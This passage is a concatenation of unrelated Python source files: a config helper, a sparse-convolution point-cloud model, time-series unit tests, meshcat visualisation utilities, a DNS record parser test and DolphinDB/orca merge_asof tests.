result = target_type(option_str)
except configparser.NoOptionError as NoOptErr:
logger.info("ERROR: " + str(NoOptErr))
logger.info("CONFIG FILE: " + self.config_fp)
assert False # Option Missing
except:
logger.info("option_str: " + str(option_str))
raise
return result
def get_option_value_or_default_value(
self, option, target_type, default_value, section=None
):
if section is None:
section = SSRConfig.default_section
if self.config.has_option(section, option):
result = self.get_option_value(
option, target_type, section=section
)
else:
result = default_value
assert type(result) == target_type
return result
def get_option_value_or_None(self, option, target_type, section=None):
if section is None:
section = SSRConfig.default_section
result = None
if self.config.has_option(section, option):
result = self.get_option_value(
option, target_type, section=section
)
return result
def log_option_value_pairs(self):
for val in self.config.values():
logger.info(val)
def write_state_to_disc(self):
with open(self.path_to_working_copy, "w") as configfile:
self.config.write(configfile)
if __name__ == "__main__":
logger.info("Main called")
config = SSRConfig(config_fp="example.cfg")
section_option_value_pairs = [
("option1", "125"),
("option2", "aaa"),
("option1", "222"),
("option3", "213"),
]
config.add_option_value_pairs(
section_option_value_pairs, section="Section1"
)
option_value_pairs = [("option5", "333"), ("option6", "555")]
config.add_option_value_pairs(option_value_pairs)
config.log_option_value_pairs()
config.write_state_to_disc()
some_number = config.get_option_value("option1", int, section="Section1")
logger.info(some_number)
logger.info(some_number + 3)
some_number = config.get_option_value("option5", int)
logger.info(some_number)
logger.info(some_number + 3)
|
1690549
|
import torch
import MinkowskiEngine as ME
from torch.utils.tensorboard import SummaryWriter
from typing import List
from collections import defaultdict
from models.transition_model import TransitionModel
from utils.pad import unpack, get_gt_values
from utils.util import timeit, downsample
from utils.scheduler import InfusionScheduler
from utils.phase import Phase
from MinkowskiEngine import SparseTensor
from utils.visualization import (
vis_2d_coords, tensors2dist_func_tensor_imgs, tensors2tensor_imgs
)
from utils.marching_cube import marching_cubes_sparse_voxel
class GCA(TransitionModel):
name = 'gca'
def __init__(self, config, writer: SummaryWriter):
TransitionModel.__init__(self, config, writer)
self.infusion_scheduler = InfusionScheduler(config)
self.bce_loss = torch.nn.BCEWithLogitsLoss()
@timeit
def forward(self, x):
'''
Forward pass through sparse convolution network
and unpack the output
input:
x: SparseTensor of
coordinates with shape N x 3
features with shape N x 1
output:
x_hat: SparseTensor of
coordinates with shape M x 3
features with shape M x k (parameter outputs)
'''
out_packed = self.backbone(x)
out_unpacked = unpack(out_packed, self.shifts[:, 1:], self.out_dim)
return out_unpacked
@timeit
def learn(
self, data: dict,
step: float, mode: str = 'train'
) -> (dict, float):
"""
:param data: dict containing key, value pairs of
- state_coord: Tensor containing coordinates of input voxels
- state_feat: Tensor containing features of input voxels
- query_point: Tensor of B x N x data_dim
- dist: Tensor of B x N x data_dim
- phase: List of phases for each data
:param step: training step
:param mode: mode of training
:return:
- next_step: dict containing same keys and values as parameter data
- loss: float of the current step's lose
"""
s_coords = ME.utils.batched_coordinates(data['state_coord'])
s_feats = torch.ones(s_coords.shape[0], 1)
s = SparseTensor(
features=s_feats,
coordinates=s_coords,
device=self.device,
)
y_coords = ME.utils.batched_coordinates(data['embedding_coord'])
y_feats = torch.ones(y_coords.shape[0], 1)
y = SparseTensor(
features=y_feats,
coordinates=y_coords,
device=self.device,
)
# forward pass
s_hat = self.forward(s)
# compute loss
losses = []
one_hot_gt, y_pad_coords = get_gt_values(s_hat, y)
phases = data['phase']
batch_size = len(phases)
feats = self.sample_feat(s_hat.F)
infusion_rates = self.infusion_scheduler.sample(phases)
s_next_feats = []
s_next_coords = []
for batch_idx, (infusion_rate, phase) in enumerate(zip(infusion_rates, phases)):
# compute loss
idx = s_hat.C[:, 0] == batch_idx
s_hat_feat = s_hat.F[idx, :]
losses.append(self.bce_loss(s_hat_feat.squeeze(1), one_hot_gt[batch_idx].float()))
# infusion training
feat = feats[idx]
coord = s_hat.C[idx, :]
infusion_idx = (torch.rand(feat.shape[0]) < infusion_rate)
s_next_feat = torch.where(
infusion_idx, one_hot_gt[batch_idx].float().cpu(), feat.cpu()
)
s_next_coords.append(coord[s_next_feat.bool(), 1:].cpu())
s_next_feats.append(torch.ones(s_next_coords[batch_idx].shape[0], 1).cpu())
# update_phases
phases[batch_idx] = phase + 1
completion_rate = one_hot_gt[batch_idx].sum().item() \
/ float((y.C[:, 0] == batch_idx).sum().item())
if completion_rate >= self.config['completion_rate']:
if not phase.equilibrium_mode:
phase.set_complete()
self.list_summaries['completion_phase/{}'.format(mode)] += [phase.phase]
elif (phase.phase > self.config['max_phase']) and (mode == 'train'):
incomplete_key = 'phase/incomplete_cnt'
self.scalar_summaries[incomplete_key] = [self.scalar_summaries[incomplete_key][0] + 1] if \
len(self.scalar_summaries[incomplete_key]) != 0 else [1]
loss = torch.stack(losses).mean()
data['state_coord'] = s_next_coords
# write summaries
self.scalar_summaries['loss/{}/total'.format(mode)] += [loss.item()]
self.list_summaries['loss/{}/total_histogram'.format(mode)] += torch.stack(losses).cpu().tolist()
self.scalar_summaries['num_points/input'] += [(s.C[:, 0] == i).sum().item() for i in range(batch_size)]
self.scalar_summaries['num_points/output'] += [one_hot_gt[i].shape[0] for i in range(batch_size)]
self.list_summaries['scheduler/infusion_rates'] += infusion_rates
if mode != 'train':
return loss.detach().cpu().item(), data
# take gradient descent
self.zero_grad()
loss.backward()
self.clip_grad()
self.optimizer.step()
self.lr_scheduler.step()
return loss.detach().cpu().item(), data
def transition(self, s: SparseTensor, sigma=None) -> SparseTensor:
y_hat = self.forward(s)
feat_sample = self.sample_feat(y_hat.F)
s_next_coord = y_hat.C[feat_sample.bool(), :]
# if the sampled output contains no coords
batch_size = s.C[:, 0].max().item() + 1
for batch_idx in range(batch_size):
if (s_next_coord[:, 0] == batch_idx).shape[0] == 0:
if s_next_coord[:, 0].shape[0] == 0:
s_next_coord = torch.zeros(1, 4).int().to(s_next_coord.device)
else:
s_next_coord = torch.stack([
s_next_coord,
torch.tensor([[batch_idx] + [0, ] * self.config['data_dim']]).int().to(s_next_coord.device)
], dim=0)
s_next_feat = torch.ones(s_next_coord.shape[0], 1)
try:
s_next = SparseTensor(
s_next_feat, s_next_coord,
device=self.device
)
except RuntimeError:
breakpoint()
return s_next
def vis_collated_imgs(self, dataset, vis_indices: List, step: int):
training = self.training
self.eval()
img_config = self.config['vis']['vis_collated_imgs']
img_2d_config = img_config['vis_2d']
img_3d_config = img_config['vis_3d']
vis_batch_size = self.config['vis_batch_size']
mini_batches = [
vis_indices[i: i + vis_batch_size]
for i in range(0, len(vis_indices), vis_batch_size)
]
for mini_batch_idxs in mini_batches:
batch = [dataset[batch_idx] for batch_idx in mini_batch_idxs]
batch_size = len(batch)
batch = dataset.collate_fn(batch)
state_coords = batch['state_coord']
state_feats = batch['state_feat']
embedding_coords = batch['embedding_coord']
file_names = batch['file_name']
num_phases = self.config['max_eval_phase']
s = SparseTensor(
features=torch.cat(state_feats),
coordinates=ME.utils.batched_coordinates(state_coords),
device=self.device,
)
if self.data_dim == 2:
img_fn = vis_2d_coords
elif self.data_dim == 3:
img_fn = tensors2dist_func_tensor_imgs
else:
raise ValueError('data dim {} not allowed'.format(self.data_dim))
# input
input_coords = [
s.C[s.C[:, 0] == batch_idx, 1:]
for batch_idx in range(batch_size)
]
input_imgs = img_fn(input_coords, img_2d_config)
input_3d_imgs = tensors2tensor_imgs(input_coords, self.data_dim, img_3d_config, batch_size)
# ground truth
gt_coords = [
embedding_coords[batch_idx].detach().cpu()
for batch_idx in range(batch_size)
]
gt_imgs = img_fn(gt_coords, img_2d_config)
gt_3d_imgs = tensors2tensor_imgs(gt_coords, self.data_dim, img_3d_config, batch_size)
output_imgs, output_3d_imgs, output_3d_imgs_batch = [], [], []
phase = Phase(
self.config['max_phase'],
self.config['equilibrium_max_phase']
)
for phase_cnt in range(num_phases):
with torch.no_grad():
s_next = self.transition(s)
s = s_next
phase += 1
# transition output
output_coords = [
s.C[s.C[:, 0] == batch_idx, 1:]
for batch_idx in range(batch_size)
]
output_imgs.append(img_fn(output_coords, img_2d_config))
output_3d_imgs.append(
tensors2tensor_imgs(output_coords, self.data_dim, img_3d_config, batch_size)
)
for batch_idx in range(batch_size):
output_imgs_batch = torch.stack([
output_imgs[phase][batch_idx]
for phase in range(num_phases)
], dim=0)
output_3d_imgs_batch = torch.stack([
output_3d_imgs[phase][batch_idx]
for phase in range(num_phases)
], dim=0)
self.writer.add_video(
'{}-img-{}'.format(dataset.mode, file_names[batch_idx]),
torch.cat([
input_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
output_imgs_batch,
gt_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
input_3d_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
output_3d_imgs_batch,
gt_3d_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
], dim=3).unsqueeze(0), global_step=step
)
self.train(training)
def evaluate(self, data, step, dataset_mode) -> float:
max_eval_phase = self.config['max_eval_phase']
losses = []
for mode in ['eval_infusion']:
data_next = data
for p in range(max_eval_phase):
loss, data_next = self.learn(data_next, step, mode=mode)
losses.append(loss)
return sum(losses) / float(len(losses))
def get_pointcloud(self, s: SparseTensor, sample_nums: List, return_mesh=True):
ret = defaultdict(list)
meshes = defaultdict(list)
for batch_idx in range(s.C[:, 0].max().item() + 1):
idx = s.C[:, 0] == batch_idx
coord = s.C[idx, 1:]
mesh = marching_cubes_sparse_voxel(coord, voxel_size=self.voxel_size)
meshes['initial_mesh'] += [mesh]
# if sample_num == 2048:
# ret[sample_num] += [downsample(coord * self.voxel_size, sample_num)]
# else:
for sample_num in sample_nums:
try:
ret[sample_num] += [torch.tensor(mesh.sample(sample_num)).float()]
except IndexError:
ret[sample_num] += [torch.zeros(sample_num, 3)] # for empty state
if return_mesh:
return ret, meshes
return ret
|
1690668
|
import datetime
import nose
from traces import TimeSeries, Histogram
def test_distribution():
start = datetime.datetime(2015, 3, 1)
# v. simple
a = TimeSeries()
a.set(start, 1)
a.set(datetime.datetime(2015, 3, 2), 0)
a.set(datetime.datetime(2015, 3, 3), 1)
a.set(datetime.datetime(2015, 3, 4), 0)
end = datetime.datetime(2015, 3, 5)
# not normalized
distribution = a.distribution(
start=start, end=end, normalized=False,
)
assert distribution[0] == 24 * 60 * 60 * 2 # two days
assert distribution[1] == 24 * 60 * 60 * 2
# normalized
distribution = a.distribution(start=start, end=end)
assert distribution[0] == 0.5
assert distribution[1] == 0.5
def test_default_values():
# v. simple
a = TimeSeries()
a.set(datetime.datetime(2015, 3, 1), 1)
a.set(datetime.datetime(2015, 3, 2), 0)
a.set(datetime.datetime(2015, 3, 3), 1)
a.set(datetime.datetime(2015, 3, 4), 0)
start = datetime.datetime(2015, 3, 1)
end = datetime.datetime(2015, 3, 4)
default = a.distribution()
distribution = a.distribution(start=start, end=end)
assert default == distribution
assert distribution[0] == 1.0 / 3
assert distribution[1] == 2.0 / 3
def test_mask():
start = datetime.datetime(2015, 3, 1)
# v. simple
a = TimeSeries()
a.set(start, 1)
a.set(datetime.datetime(2015, 4, 2), 0)
a.set(datetime.datetime(2015, 4, 3), 1)
a.set(datetime.datetime(2015, 4, 4), 0)
end = datetime.datetime(2015, 4, 5)
mask = TimeSeries(default=False)
mask[datetime.datetime(2015, 4, 1)] = True
mask[datetime.datetime(2015, 4, 3)] = False
# not normalized
distribution = a.distribution(
start=start, end=end, normalized=False, mask=mask,
)
assert distribution[0] == 24 * 60 * 60 # one day
assert distribution[1] == 24 * 60 * 60
# normalized
distribution = a.distribution(
start=start, end=end, mask=mask,
)
assert distribution[0] == 0.5
assert distribution[1] == 0.5
def test_integer_times():
# v. simple
a = TimeSeries()
a[0] = 1
a[1] = 0
a[3] = 1
a[4] = 0
distribution = a.distribution(start=0, end=6)
assert distribution[0] == 2.0 / 3
assert distribution[1] == 1.0 / 3
def test_distribution_set():
time_series = TimeSeries()
time_series[1.2] = {'broccoli'}
time_series[1.4] = {'broccoli', 'orange'}
time_series[1.7] = {'broccoli', 'orange', 'banana'}
time_series[2.2] = {'orange', 'banana'}
time_series[3.5] = {'orange', 'banana', 'beets'}
# TODO: How to convert the set into multiple ts?
def test_distribution_empty():
ts = TimeSeries()
mask = TimeSeries(default=0)
mask[0] = 1
mask[2] = 0
# distribution with default args and no default value on empty
# TimeSeries doesn't know what to do
nose.tools.assert_raises(KeyError, ts.distribution)
# distribution with start and end, but no default value on empty
# TimeSeries doesn't know what to do
assert ts.distribution(0, 10) == Histogram.from_dict({None: 1.0})
# no matter what is passed in to distribution, if the default
# value is not set on an empty TimeSeries this should be an error
ts.distribution(mask=mask) == Histogram.from_dict({None: 1.0})
# nose.tools.assert_raises(KeyError, ts.distribution, mask=mask)
ts = TimeSeries(default=0)
# no mask or start/end on empty TimeSeries, don't know what to do
nose.tools.assert_raises(KeyError, ts.distribution)
# start and end or mask given, is fine
distribution = ts.distribution(0, 10)
assert distribution[0] == 1.0
distribution = ts.distribution(mask=mask)
assert distribution[0] == 1.0
# empty mask
mask = TimeSeries(default=0)
with nose.tools.assert_raises(ValueError):
ts.distribution(mask=mask)
with nose.tools.assert_raises(ValueError):
ts.distribution(start=0, end=2, mask=mask)
def test_none_handling():
ts = TimeSeries()
ts[1] = (0, 1)
ts[2] = (None, 0)
ts[3] = (2, 0)
# print(ts.distribution(normalized=False))
assert(ts.distribution()[(0, 1)] == 0.5)
assert(ts.distribution()[(None, 0)] == 0.5)
|
1690695
|
from .pydbg import DebuggerBase, DbgEng
class CrashDbg(DebuggerBase):
def __init__(self):
super().__init__(client=None, standalone=True)
def load_dump(self, name):
self._client.OpenDumpFile(name)
self.go()
|
1690708
|
import numpy as np
import matplotlib.pyplot as plt
# ========== HW04 SOLUTION [Python2] ========== #
# ========== 1 ========== #
five_dim_array = np.load('five_dim_array.npy')
array_flat = five_dim_array.flatten()
print array_flat.argmin()
# ========== 2 ========== #
x = np.linspace(-10, 10)
plt.figure()
plt.plot(x, 1 / x, label=r'$f(x) = \frac{1}{x}$')
plt.plot(x, x, label=r'$g(x) = x$')
plt.plot(x, x ** 2, label=r'$h(x) = x^2$')
plt.plot(x, x ** 3, label=r'$k(x) = x^3$')
plt.legend()
plt.show()
# ========== 3 ========== #
x = np.linspace(-1, 4, num=50)
y = 3.7 * x ** 2 - 7.0 * x + 3.1
noise = np.random.normal(0, 5, size=50)
plt.figure()
plt.plot(x, y + noise, label=r'$f(x) = 3.72x^2-7.0x+3.1 + \epsilon$')
plt.plot(x, y, label=r'$f(x) = 3.72x^2-7.0x+3.1$')
plt.grid(True)
plt.xlabel('x')
plt.ylabel('f(x)')
plt.show()
|
1690721
|
import json
from math import exp
from matplotlib import pyplot as plt
if __name__ == "__main__":
with open("primitives.json", "r") as f:
primitives = {x['label']:x for x in json.load(f)}
with open("results.json", "r") as f:
results = json.load(f)["results"]
ys_precip = [r['intervened']['value']['value'] for r in results if r['id'] == primitives['UN/events/weather/precipitation']['id']]
ys_fp = [r['intervened']['value']['value'] for r in results if r['id'] == primitives['UN/events/human/agriculture/food_production']['id']]
tau=1.0
ys_derivs = [-0.6*exp(-tau*i) for i in range(len(ys_precip))]
xs = range(len(ys_precip))
plt.style.use('ggplot')
plt.plot(xs, ys_precip, label="precipitation")
plt.plot(xs, ys_fp, label="food_production")
plt.plot(xs, ys_derivs, label="∂(precipitation)/∂t")
plt.legend()
plt.savefig('experiment_timeseries.png')
|
1690754
|
from __future__ import absolute_import
from __future__ import print_function
from .products import load_product_yaml
from .yaml import open_raw
def open_environment(build_config_yaml_path, product_yaml_path):
contents = open_raw(build_config_yaml_path)
contents.update(load_product_yaml(product_yaml_path))
return contents
|
1690832
|
import meshcat
import numpy as np
import pinocchio as pin
# Meshcat utils
def meshcat_material(r, g, b, a):
import meshcat
material = meshcat.geometry.MeshPhongMaterial()
material.color = int(r * 255) * 256 ** 2 + int(g * 255) * 256 + int(b * 255)
material.opacity = a
return material
def meshcat_transform(x, y, z, q, u, a, t):
return np.array(pin.XYZQUATToSE3([x, y, z, q, u, a, t]))
# Gepetto/meshcat abstraction
def addViewerBox(viz, name, sizex, sizey, sizez, rgba):
if isinstance(viz, pin.visualize.MeshcatVisualizer):
viz.viewer[name].set_object(meshcat.geometry.Box([sizex, sizey, sizez]),
meshcat_material(*rgba))
elif isinstance(viz, pin.visualize.GepettoVisualizer):
viz.viewer.gui.addBox(name, sizex, sizey, sizez, rgba)
else:
raise AttributeError("Viewer %s is not supported." % viz.__class__)
def addViewerSphere(viz, name, size, rgba):
if isinstance(viz, pin.visualize.MeshcatVisualizer):
viz.viewer[name].set_object(meshcat.geometry.Sphere(size),
meshcat_material(*rgba))
elif isinstance(viz, pin.visualize.GepettoVisualizer):
viz.viewer.gui.addSphere(name, size, rgba)
else:
raise AttributeError("Viewer %s is not supported." % viz.__class__)
def applyViewerConfiguration(viz, name, xyzquat):
if isinstance(viz, pin.visualize.MeshcatVisualizer):
viz.viewer[name].set_transform(meshcat_transform(*xyzquat))
elif isinstance(viz, pin.visualize.GepettoVisualizer):
viz.viewer.gui.applyConfiguration(name, xyzquat)
viz.viewer.gui.refresh()
else:
raise AttributeError("Viewer %s is not supported." % viz.__class__)
'''
viz.viewer['world/ball'].set_object(meshcat.geometry.Sphere(.1),
meshcat_material(.2, .2, 1., .5))
viz.viewer['world/box'].set_transform(meshcat_transform(.5, .2, .2, 1, 0, 0, 0))
viz.viewer['world/ball'].set_transform(meshcat_transform(-.5, .2, .2, 1, 0, 0, 0))
'''
|
1690855
|
import datetime
import pathlib
import unittest
from freenom_dns_updater import Record, RecordType
from freenom_dns_updater.record_parser import RecordParser
class DomainParserTest(unittest.TestCase):
def test_parse_records(self):
path = pathlib.Path(__file__).parent / "resources" / "record_page.html"
html = path.read_text()
records = RecordParser.parse(html)
self.assertEqual(2, len(records))
expected = Record()
expected.target = "fc00:db20:35b:7399::5:8888"
expected.ttl = 800
expected.name = "IPV6"
expected.type = RecordType.AAAA
self.assertIn(expected, records)
if __name__ == '__main__':
unittest.main()
|
1690869
|
import unittest
import orca
import os.path as path
from setup.settings import *
from pandas.util.testing import *
def _create_odf_csv(datal, datar):
dfsDatabase = "dfs://testMergeAsofDB"
s = orca.default_session()
dolphindb_script = """
login('admin', '<PASSWORD>')
if(existsDatabase('{dbPath}'))
dropDatabase('{dbPath}')
db=database('{dbPath}', VALUE, 2010.01M..2010.05M)
stb1=extractTextSchema('{data1}')
update stb1 set type="SYMBOL" where name="type"
stb2=extractTextSchema('{data2}')
update stb2 set type="SYMBOL" where name="ticker"
loadTextEx(db,`tickers,`date, '{data1}',,stb1)
loadTextEx(db,`values,`date, '{data2}',,stb2)
""".format(dbPath=dfsDatabase, data1=datal, data2=datar)
s.run(dolphindb_script)
class Csv:
odfs_csv_left = None
odfs_csv_right = None
pdf_csv_left = None
pdf_csv_right = None
class DfsMergeTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# configure data directory
DATA_DIR = path.abspath(path.join(__file__, "../setup/data"))
left_fileName = 'test_merge_asof_left_table.csv'
right_fileName = 'test_merge_asof_right_table.csv'
datal = os.path.join(DATA_DIR, left_fileName)
datal= datal.replace('\\', '/')
datar = os.path.join(DATA_DIR, right_fileName)
datar = datar.replace('\\', '/')
dfsDatabase = "dfs://testMergeAsofDB"
# connect to a DolphinDB server
orca.connect(HOST, PORT, "admin", "123456")
_create_odf_csv(datal, datar)
# import
Csv.odfs_csv_left = orca.read_table(dfsDatabase, 'tickers')
Csv.pdf_csv_left = pd.read_csv(datal, parse_dates=[0])
Csv.odfs_csv_right = orca.read_table(dfsDatabase, 'values')
Csv.pdf_csv_right = pd.read_csv(datar, parse_dates=[0])
@property
def odfs_csv_left(self):
return Csv.odfs_csv_left
@property
def odfs_csv_right(self):
return Csv.odfs_csv_right
@property
def pdf_csv_left(self):
return Csv.pdf_csv_left
@property
def pdf_csv_right(self):
return Csv.pdf_csv_right
@property
def odfs_csv_left_index(self):
return Csv.odfs_csv_left.set_index("date")
@property
def odfs_csv_right_index(self):
return Csv.odfs_csv_right.set_index("date")
@property
def pdf_csv_left_index(self):
return Csv.pdf_csv_left.set_index("date")
@property
def pdf_csv_right_index(self):
return Csv.pdf_csv_right.set_index("date")
@property
def odfs_bid_csv_left(self):
return self.odfs_csv_left.sort_values(by=['bid', 'date']).reset_index(drop=True)
@property
def odfs_bid_csv_right(self):
return self.odfs_csv_right.sort_values(by=['bid', 'date']).reset_index(drop=True)
@property
def pdf_bid_csv_left(self):
return self.pdf_csv_left.sort_values(by=['bid', 'date']).reset_index(drop=True)
@property
def pdf_bid_csv_right(self):
return self.pdf_csv_right.sort_values(by=['bid', 'date']).reset_index(drop=True)
@property
def odfs_bid_csv_left_index(self):
return self.odfs_csv_left.sort_values(by=['bid', 'date']).set_index('bid')
@property
def odfs_bid_csv_right_index(self):
return self.odfs_csv_right.sort_values(by=['bid', 'date']).set_index('bid')
@property
def pdf_bid_csv_left_index(self):
return self.pdf_csv_left.sort_values(by=['bid', 'date']).set_index('bid')
@property
def pdf_bid_csv_right_index(self):
return self.pdf_csv_right.sort_values(by=['bid', 'date']).set_index('bid')
def test_assert_original_dataframe_equal(self):
assert_frame_equal(self.odfs_csv_left.to_pandas(), self.pdf_csv_left, check_dtype=False)
assert_frame_equal(self.odfs_csv_right.to_pandas(), self.pdf_csv_right, check_dtype=False)
assert_frame_equal(self.odfs_csv_left_index.to_pandas(), self.pdf_csv_left_index, check_dtype=False)
assert_frame_equal(self.odfs_csv_right_index.to_pandas(), self.pdf_csv_right_index, check_dtype=False)
assert_frame_equal(self.odfs_bid_csv_left.to_pandas(), self.pdf_bid_csv_left, check_dtype=False)
assert_frame_equal(self.odfs_bid_csv_right.to_pandas(), self.pdf_bid_csv_right, check_dtype=False)
assert_frame_equal(self.odfs_bid_csv_left_index.to_pandas(), self.pdf_bid_csv_left_index, check_dtype=False)
assert_frame_equal(self.odfs_bid_csv_right_index.to_pandas(), self.pdf_bid_csv_right_index, check_dtype=False)
def test_merge_asof_from_dfs_param_on(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date')
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date')
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid')
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid')
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date')
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date')
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid')
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid')
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True)
odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True)
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True, right_index=True)
odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True, right_index=True)
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_by(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', by='ticker')
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', by='ticker')
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftbyrightby(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', left_by='ticker', right_by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', left_by='ticker', right_by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
right_by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton_param_suffixes(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date',
suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date',
suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid',
suffixes=('_left', '_right'))
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid',
suffixes=('_left', '_right'))
assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton_param_by(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date', by='ticker')
odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date', by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid', by='ticker')
odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid', by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_leftonrighton_param_leftbyrightby(self):
pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', left_by='ticker', right_by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', left_by='ticker', right_by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
right_by='ticker')
# TODO:ORCA by bug
# odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', left_by='ticker', right_by='ticker')
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index_param_by(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
by='ticker')
odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
right_index=True, by='ticker')
odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
right_index=True, by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
def test_merge_asof_from_dfs_param_index_param_leftbyrightby(self):
pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True,
left_by='ticker', right_by='ticker')
odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True,
left_by='ticker', right_by='ticker')
# TODO:ORCA by bug
# assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True,
right_index=True, left_by='ticker',
right_by='ticker')
odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True,
